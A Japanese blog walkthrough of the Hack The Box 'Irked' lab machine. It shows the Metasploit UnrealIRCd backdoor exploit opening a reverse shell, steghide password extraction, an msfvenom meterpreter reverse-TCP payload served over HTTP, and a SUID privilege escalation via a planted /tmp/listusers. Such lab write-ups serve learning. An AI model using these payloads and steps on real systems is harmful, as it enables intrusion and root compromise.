筆者は Hack the Box 初心者です。 何か訂正や補足、アドバイスなどありましたら、コメントか Twitter までお願いします。 さんぽし(@sanpo_shiho) | Twitter
cheat sheet
以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET
machine について
難易度は easy です。
ちなみに投稿現在 easy 問題で一番評価が高い machine です。
nmap
kali@kali:~$ nmap -sC -sV -p- 10.10.10.117
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-03 08:53 EST
Nmap scan report for 10.10.10.117
Host is up (0.19s latency).
Not shown: 65527 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 38957/udp6 status
| 100024 1 53488/tcp status
| 100024 1 55121/tcp6 status
|_ 100024 1 59725/udp status
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
45986/tcp filtered unknown
53488/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4393.09 secondsrpcbind とは
https://blog.goo.ne.jp/kwuso/e/eb14ed3801ef54fc7701c38ec141064c
80 番 port をブラウザでみる
IRC とは
https://ja.wikipedia.org/wiki/Internet_Relay_Chat
UnrealIRCd の exploit 打ってみる
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 6667 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic Target
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 10.10.10.117
rhosts => 10.10.10.117
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] Started reverse TCP double handler on 10.10.14.8:4444
[-] 10.10.10.117:6667 - Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (10.10.10.117:6667).
[*] Exploit completed, but no session was created.
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 6697
rport => 6697
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] Started reverse TCP double handler on 10.10.14.8:4444
[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
:irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:6697 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 5IAAtu5gtJWs13ky;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "5IAAtu5gtJWs13ky\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.10.14.8:4444 -> 10.10.10.117:60793) at 2020-03-03 09:59:52 -0500
whoami
ircdircd ユーザーを取れました。が、
whoami
ircd
pwd
/home/ircd/Unreal3.2
cd ..
ls
Unreal3.2
cd ..
ls
djmardov
ircd
cd djmardov
ls
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
Videos
cd Desktop
ls
cd ..
cd Documents
ls
user.txt
cat user.txt
cat: user.txt: Permission denieduser.txt 見つけた!と思いましたが取れません。
色々見てみる
とりあえずこの /home/djmardov 内を探索します。
すると user.txt と同じ /home/djmardov/Documents 内に.backup というファイルを発見します。
ls -a
.
..
.backup
user.txt
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss.backup の中身は
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSssとなっています。
steg が指すものは?
「steg linux」と検索すると出てきました。Steganographyという画像内にファイルを隠すというなんとも厨二心くすぐられるツールだそうです。
https://www.ostechnix.com/hide-files-inside-images-linux/
ここでなんの画像を Steganography で検証すればいいかというところでつまりました。。
他の方の writeup をチラ見すると、ポート 80 番で出てきていたあの顔の画像を調べるということでした。(なるほど…言われてみればあのページの存在意味ないですもんね…自分で気づきたかった)
ポート 80 番で出てきていたあの顔の画像を Steganography で検証
以下のページを参考にします。 https://www.blackmoreops.com/2017/01/11/steganography-in-kali-linux-hiding-data-in-image/
kali@kali:~$ sudo apt-get install steghide
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
libmcrypt4 libmhash2
Suggested packages:
libmcrypt-dev mcrypt
The following NEW packages will be installed:
libmcrypt4 libmhash2 steghide
0 upgraded, 3 newly installed, 0 to remove and 462 not upgraded.
Need to get 309 kB of archives.
After this operation, 895 kB of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 http://ftp.riken.jp/Linux/kali kali-rolling/main amd64 libmcrypt4 amd64 2.5.8-3.4+b1 [73.3 kB]
Get:2 http://ftp.riken.jp/Linux/kali kali-rolling/main amd64 libmhash2 amd64 0.9.9.9-8 [93.9 kB]
Get:3 http://ftp.riken.jp/Linux/kali kali-rolling/main amd64 steghide amd64 0.5.1-14 [142 kB]
Fetched 309 kB in 1s (232 kB/s)
Selecting previously unselected package libmcrypt4.
(Reading database ... 274809 files and directories currently installed.)
Preparing to unpack .../libmcrypt4_2.5.8-3.4+b1_amd64.deb ...
Unpacking libmcrypt4 (2.5.8-3.4+b1) ...
Selecting previously unselected package libmhash2:amd64.
Preparing to unpack .../libmhash2_0.9.9.9-8_amd64.deb ...
Unpacking libmhash2:amd64 (0.9.9.9-8) ...
Selecting previously unselected package steghide.
Preparing to unpack .../steghide_0.5.1-14_amd64.deb ...
Unpacking steghide (0.5.1-14) ...
Setting up libmhash2:amd64 (0.9.9.9-8) ...
Setting up libmcrypt4 (2.5.8-3.4+b1) ...
Setting up steghide (0.5.1-14) ...
Processing triggers for libc-bin (2.29-9) ...
Processing triggers for man-db (2.9.0-2) ...
Processing triggers for kali-menu (2020.1.7) ...
Scanning processes...
Scanning linux images...
Running kernel seems to be up-to-date.
No services need to be restarted.
No containers need to be restarted.
No user sessions are running outdated binaries.
kali@kali:~$ wget http://10.10.10.117/irked.jpg
--2020-03-03 10:39:32-- http://10.10.10.117/irked.jpg
Connecting to 10.10.10.117:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 34697 (34K) [image/jpeg]
Saving to: ‘irked.jpg’
irked.jpg 100%[==========================================================================================>] 33.88K 181KB/s in 0.2s
2020-03-03 10:39:32 (181 KB/s) - ‘irked.jpg’ saved [34697/34697]
kali@kali:~$ steghide extract -sf irked.jpg
Enter passphrase:
wrote extracted data to "pass.txt".
kali@kali:~$ ls
AutoRecon Documents hacking-lab Music Pictures __pycache__ Templates Videos Windows-Exploit-Suggester
Desktop Downloads irked.jpg pass.txt Public SecLists unicorn vpn
kali@kali:~$ cat pass.txt
Kab6h+m+bbp2J:HGpass.txtというものが出てきました。
ssh で djmardov としてログイン
kali@kali:~$ ssh [email protected]
The authenticity of host '10.10.10.117 (10.10.10.117)' can't be established.
ECDSA key fingerprint is SHA256:kunqU6QEf9TV3pbsZKznVcntLklRwiVobFZiJguYs4g.
Are you sure you want to continue connecting (yes/no/[fingerprint])? no
Host key verification failed.
kali@kali:~$ ssh [email protected]
The authenticity of host '10.10.10.117 (10.10.10.117)' can't be established.
ECDSA key fingerprint is SHA256:kunqU6QEf9TV3pbsZKznVcntLklRwiVobFZiJguYs4g.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.117' (ECDSA) to the list of known hosts.
[email protected]'s password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 15 08:56:32 2018 from 10.33.3.3
djmardov@irked:~$ ls
Desktop Documents Downloads Music Pictures Public Templates Videos
djmardov@irked:~$ cd Documents/
djmardov@irked:~/Documents$ ls
user.txtこれで user.txt は取れました。
meterpreter に繋ぎ直し
msfvenom を使って一旦 meterpreter に繋ぎ直します。 https://nitesculucian.github.io/2018/07/24/msfvenom-cheat-sheet/
kali@kali:~$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=1212 -f elf > example.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
kali@kali:~$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...msf5 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > set lhost 10.10.14.8
lhost => 10.10.14.8
msf5 exploit(multi/handler) > set lport 1212
lport => 1212
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/handler) >
[*] Started reverse TCP handler on 10.10.14.8:1212
[*] Sending stage (985320 bytes) to 10.10.10.117
[*] Meterpreter session 5 opened (10.10.14.8:1212 -> 10.10.10.117:45534) at 2020-03-05 09:30:27 -0500
meterpreter >suggester 使う
meterpreter > background
[*] Backgrounding session 5...
msf5 exploit(multi/handler) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
msf5 exploit(multi/handler) > use 0
msf5 post(multi/recon/local_exploit_suggester) > set session 5
session => 5
msf5 post(multi/recon/local_exploit_suggester) > options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 5 yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf5 post(multi/recon/local_exploit_suggester) > set SHOWDESCRIPTION true
SHOWDESCRIPTION => true
msf5 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.117 - Collecting local exploits for x86/linux...
[*] 10.10.10.117 - 34 exploit checks are being tried...
[+] 10.10.10.117 - exploit/linux/local/network_manager_vpnc_username_priv_esc: The service is running, but could not be validated.
This module exploits an injection vulnerability in the Network
Manager VPNC plugin to gain root privileges. This module uses a new
line injection vulnerability in the configured username for a VPN
network connection to inject a `Password helper` configuration
directive into the connection configuration. The specified helper is
executed by Network Manager as root when the connection is started.
Network Manager VPNC versions prior to 1.2.6 are vulnerable. This
module has been tested successfully with VPNC versions: 1.2.4-4 on
Debian 9.0.0 (x64); and 1.1.93-1 on Ubuntu Linux 16.04.4 (x64).
[+] 10.10.10.117 - exploit/linux/local/pkexec: The service is running, but could not be validated.
A race condition flaw was found in the PolicyKit pkexec utility and
polkitd daemon. A local user could use this flaw to appear as a
privileged user to pkexec, allowing them to execute arbitrary
commands as root by running those commands with pkexec. Those
vulnerable include RHEL6 prior to polkit-0.96-2.el6_0.1 and Ubuntu
libpolkit-backend-1 prior to 0.96-2ubuntu1.1 (10.10) 0.96-2ubuntu0.1
(10.04 LTS) and 0.94-1ubuntu1.1 (9.10)
[*] Post module execution completed2 つ suggest されたので試します。
試す
長いので載せませんが、結果はどちらも使えませんでした。。
linuxprivchecker.py で色々調べる
https://www.securitysift.com/download/linuxprivchecker.py を使います。
djmardov@irked:~$ python linuxprivchecker.py > hoge.txtすると色々分析されて出てきます。(ちなみに linuxprivchecker.py は先ほどと同様に kali から送ってます。)
手始めに hoge.txt 内を「pass」「user」などで検索していると怪しいものがありました。
[+] SUID/SGID Files and Directories
~~~~~~~(省略)~~~~~~~
-rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser(おさらい)SUID/SGID File とは
https://yukun.info/linux-suid-sgid-find/
/usr/bin/viewuser 実行してみる
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2020-03-05 09:29 (:0)
djmardov pts/0 2020-03-05 09:29 (10.10.14.19)
djmardov pts/1 2020-03-05 09:58 (10.10.14.19)
sh: 1: /tmp/listusers: not found/tmp/listusersが存在しないと言われます。developed っていうてますしね。
ここで着目すべきは /usr/bin/viewuser は root 権限で実行されているということです。
すなわち /tmp/listusers を自分で作成し、root 権限で実行させたい内容を書けば実行してくれます。
djmardov@irked:~$ echo '/bin/sh' > /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2020-03-05 09:29 (:0)
djmardov pts/0 2020-03-05 09:29 (10.10.14.19)
djmardov pts/1 2020-03-05 09:58 (10.10.14.19)
sh: 1: /tmp/listusers: Permission denied
djmardov@irked:~$ chmod 777 /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2020-03-05 09:29 (:0)
djmardov pts/0 2020-03-05 09:29 (10.10.14.19)
djmardov pts/1 2020-03-05 09:58 (10.10.14.19)
# whoami
rootこれで root が取れました。
終わりに
最後の sh: 1: /tmp/listusers: not found で僕は完全に詰まって他の人の writeup をカンニングしてしまいました。
精進します。。
